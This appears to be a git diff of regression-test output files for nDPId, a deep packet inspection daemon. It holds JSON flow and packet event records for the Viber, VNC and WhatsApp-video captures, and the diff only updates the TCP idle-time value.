00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155685757,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":424,"source":"viber.pcap","alias":"nDPId-test","packets-captured":424,"packets-processed":420,"total-skipped-flows":0,"total-l4-data-len":122215,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":23,"total-detection-updates":17,"total-updates":0,"current-active-flows":0,"total-active-flows":26,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":165,"global_ts_msec":1527155685757} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/vnc.pcap.out b/test/results/vnc.pcap.out index d0bfdab97..41f6275a8 100644 --- a/test/results/vnc.pcap.out +++ b/test/results/vnc.pcap.out 
@@ -1,17 +1,17 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"vnc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1476111264364} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111264364,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111264364,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 
Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"} 
-00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00946{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} -00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111264364,"flow_last_seen":1476111264364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111264364,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1476111264364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"EP7tAkntxOodxQGGCABFAAA0Xs1AAHQGVCNf7TDQwKgCbumPGvTqxTBkAAAAAIACIADbnAAAAgQFrAEDAwIBAQQC"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1476111264364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111264364,"pkt":"xOodxQGGEP7tAkntCABFAAA0fFNAAIAGAADAqAJuX+0w0Br06Y8QfmeF6sUwZYASIABT+gAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1476111264402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111264402,"pkt":"EP7tAkntxOodxQGGCABFAAAoXs5AAHQGVC5f7TDQwKgCbumPGvTqxTBlEH5nhlAQQTqDEwAAAAAAAAAA"} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111264364,"flow_last_seen":1476111264453,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111264453,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non 
Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1476111286462,"flow_last_seen":1476111286462,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1476111286462,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3544,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1476111286462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"EP7tAkntxOodxQGGCABFAAA0be5AAHQGRQJf7TDQwKgCbslnGvTjPDftAAAAAIACIAD7xAAAAgQFrAEDAwIBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3545,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1476111286462,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1476111286462,"pkt":"xOodxQGGEP7tAkntCABFAAA0AmNAAIAGAADAqAJuX+0w0Br0yWdPW3mt4zw37oASIABT+gAAAgQFtAEDAwgBAQQC"} 
+00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3546,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1476111286499,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1476111286499,"pkt":"EP7tAkntxOodxQGGCABFAAAobe9AAHQGRQ1f7TDQwKgCbslnGvTjPDfuT1t5rlAQQTpSNgAAAAAAAAAA"} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3548,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1476111286462,"flow_last_seen":1476111286549,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1476111286549,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00946{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1008,"flow_first_seen":1476111286462,"flow_last_seen":1476111290613,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":17966,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":51559,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": 
{"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3543,"flow_first_seen":1476111264364,"flow_last_seen":1476111280884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":64300,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1476111290613,"l3_proto":"ip4","src_ip":"95.237.48.208","dst_ip":"192.168.2.110","src_port":59791,"dst_port":6900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"30": {"risk":"Desktop\/File Sharing Session","severity":"Low","risk_score": {"total":1000,"client":800,"server":200}}},"confidence": {"4":"DPI"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4551,"source":"vnc.pcap","alias":"nDPId-test","packets-captured":4551,"packets-processed":4551,"total-skipped-flows":0,"total-l4-data-len":82266,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1476111290613} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4551/4551 
diff --git a/test/results/wa_video.pcap.out b/test/results/wa_video.pcap.out index e9c90776d..09ab66fd6 100644 --- a/test/results/wa_video.pcap.out +++ b/test/results/wa_video.pcap.out 
@@ -3,10 +3,10 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561455764448,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455764448,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI0kIAAEARIhLAqAIBwKgC\/+EV4RUANEtUU3BvdFVkcDC64ScQKi2g\/wABAARIlcIDyUSzc\/3fJAksKuG26pMF0apN5Ek="} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7440000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"thread_ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01213{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="} 
